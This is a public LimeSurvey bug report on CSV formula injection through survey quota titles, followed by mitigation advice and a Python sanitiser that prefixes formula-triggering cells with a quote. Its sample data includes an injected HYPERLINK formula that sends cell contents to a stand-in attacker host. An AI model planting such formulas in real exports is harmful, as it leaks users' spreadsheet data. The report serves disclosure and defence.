View Issue Details
|ID||Project||Category||View Status||Date Submitted||Last Update|
|19253||Bug reports||Security||public||2023-11-20 12:15||2023-11-20 12:16|
|Summary||19253: CSV injection in export quota|
When a spreadsheet program such as Microsoft Excel or LibreOffice Calc opens a CSV file, it interprets any cell that begins with "=" as a formula and evaluates it on load. CSV injection, also known as formula injection, occurs when a web application writes user-supplied data into a CSV file without validating or escaping it first.
|Tags||No tags attached.|
|Complete LimeSurvey version number (& build)||6.3.1+231023|
|I will donate to the project if issue is resolved||No|
|Database type & version||not relevant|
|Server OS (if known)||not relevant|
|Webserver software & version (if known)||not relevant|
|PHP Version||not relevant|
It is possible to inject CSV formulas into the titles of survey quotas, which can subsequently be exported to CSV.
To mitigate this vulnerability, validate the input entered by a user (or escape it at export time) so that no exported cell begins with a character that a spreadsheet treats as the start of a formula:
Equal to ("=")
Excel and LibreOffice Calc also treat a leading plus ("+"), minus ("-") or at-sign ("@") as a formula start, as well as a leading tab or carriage return, so a check for "=" alone is not sufficient. A common export-side escape is to prefix such cells with a single quote (') so that the spreadsheet displays them as text.
On its own, this issue would have limited impact, since a user's quotas can only be exported by that same user. However, combined with the vulnerability that allows editing quotas belonging to other users, an attacker could add malicious formulas to another user's quotas, which would be executed when that user exports them and opens the file in a spreadsheet.
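The export-side escape recommended above, as an added example that is not LimeSurvey's own code: a small Python CSV writer that detects formula-triggering cells and neutralises them with a leading single quote. The quota records, field names and the sample injected title are constructed for the demonstration and are not taken from LimeSurvey.

```python
import csv
import io

# Characters Excel and LibreOffice Calc treat as the start of a formula when a
# CSV cell begins with them. Tab and carriage return are included because some
# versions skip them as leading whitespace and then see the real trigger.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(cell: str) -> bool:
    """True if a spreadsheet would evaluate this cell as a formula on load."""
    return cell.startswith(FORMULA_TRIGGERS)


def sanitize_csv_cell(cell: str) -> str:
    """Neutralise a cell so it is shown as text rather than evaluated.

    A leading single quote tells the spreadsheet to treat the content as a
    literal string. Nothing else is changed, so a quota title that
    legitimately starts with "-" still reads correctly after export.
    """
    if is_formula_like(cell):
        return "'" + cell
    return cell


def export_quotas(quotas, sanitize=True) -> str:
    """Render quota records (list of dicts with id/name/limit) as CSV text.

    sanitize=False reproduces the vulnerable behaviour: the user-controlled
    quota name is written to the file exactly as stored.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(["id", "name", "limit"])
    for q in quotas:
        name = sanitize_csv_cell(q["name"]) if sanitize else q["name"]
        writer.writerow([q["id"], name, q["limit"]])
    return buf.getvalue()


# Constructed sample data: one ordinary quota and one whose title carries a
# formula of the kind an attacker could store in another user's quota.
SAMPLE_QUOTAS = [
    {"id": 1, "name": "Region A", "limit": 50},
    {"id": 2,
     "name": '=HYPERLINK("https://attacker.example/?q="&A2,"Open")',
     "limit": 10},
]


def demo():
    """Return (vulnerable_csv, hardened_csv) for the sample quotas."""
    return export_quotas(SAMPLE_QUOTAS, sanitize=False), export_quotas(SAMPLE_QUOTAS)


if __name__ == "__main__":
    raw, safe = demo()
    print("--- unsanitised export (formula will be evaluated) ---")
    print(raw)
    print("--- sanitised export (formula shown as text) ---")
    print(safe)
```

Note that the check is applied to the value as it will appear in the cell, after any CSV quoting is removed by the spreadsheet, which is why the single quote is added to the cell content itself rather than relying on the writer's double-quote wrapping.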
Attached file: 6.png (118,467 bytes)